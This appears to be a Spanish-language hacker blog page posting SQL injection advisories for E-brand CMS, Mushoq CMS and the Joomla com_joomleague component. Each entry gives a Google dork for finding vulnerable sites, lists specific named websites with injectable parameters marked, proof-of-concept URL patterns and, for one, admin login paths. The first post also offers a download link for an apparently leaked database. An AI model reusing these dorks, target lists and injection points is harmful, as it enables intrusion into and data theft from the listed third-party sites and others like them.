DixHost [ Exposed Db ]

Publicado por xDarkSton3x On 9:52 0 comentarios

Descarga Db : Click Aqui


##################################################
# Exploit Title: E-brand CMS Vuln SQL injection Vulnerability
# Vendor: http://www.ebrand.com.br/
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
#Twitter: @xdarkston3x
# Category: webapps
# Google dork: intext:desenvolvido por e-brand
# Example Sites : 
http://www.institutotommasi.org.br/projeto_selecionado.php?Cod_Projeto='
http://www.esconvention.com.br/turismo/evento_escolhido.asp?Cod_Evento='
http://www.quintelatorres.com.br/noticias_interno.php?Cod_Noticia='
http://www.landsteiner.com.br/noticias.php?Cod_NoticiaCategoria='
http://www.geres.gov.br/noticias_detalhe.php?Cod_Noticia='
http://www.vitoriahospitalar.com.br/evento-detalhe.php?evento='
http://www.novapol.com.br/produto.php?Cod_Produto='
http://www.cecon.med.br/dicas-detalhe.php?iDica='

##################################################

[~]Exploit/p0c :
http://www.site.com/x.php?var=[sqli]

[~]Panel Admin :
/adm/login.php
/adm/

[~]Reporte :
http://www.1337day.com/exploits/18083
http://w00t.pro/2012/04/20/2782/

Mushoq CMS SQL injection Vulnerability

Publicado por xDarkSton3x On 0:11 0 comentarios

##################################################
# Exploit Title: Mushoq CMS SQL injection Vulnerability
# Vendor: http://www.mushoq.com/
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
#Twitter: @xdarkston3x
# Category: webapps
# Google dork: intext:desarrollo Web mushoq inurl:index.php?idSeccion=
# Example Sites : 
http://www.clave.com.ec/index.php?idSeccion=%27
http://www.edesa.com.ec/index.php?idSeccion=%27
http://www.rvc.com.ec/index.php?idSeccion=%27
http://www.cip.org.ec/index.php?idSeccion=%27
http://www.cgbseguridad.com/index.php?idSeccion=%27
http://www.verdesintetico.com/index.php?idSeccion=%27

##################################################

[~]Exploit/p0c :
http://www.site.com/index.php?idSeccion=[sqli]

[~]Reporte :
http://www.1337day.com/exploits/18096
http://w00t.pro/2012/04/21/2841/

##################################################
# Exploit Title: joomla component (com_joomleague) SQL injection Vulnerability
#Vendor: http://www.joomleague.net/
# Date: 22/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category:: webapps
# Example Sites : 
http://www.joomleague.net/index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid='
http://www.cdovalle.cl/index.php?option=com_joomleague&func=showNextMatch&p=9'

# Tested on: linux + windows
##################################################

[~]Exploit/p0c :
http://www.site.com/index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
http://www.site.com/index.php?option=com_joomleague&func=showNextMatch&p=[sqli]

[~]Reporte :
http://www.1337day.com/exploits/18114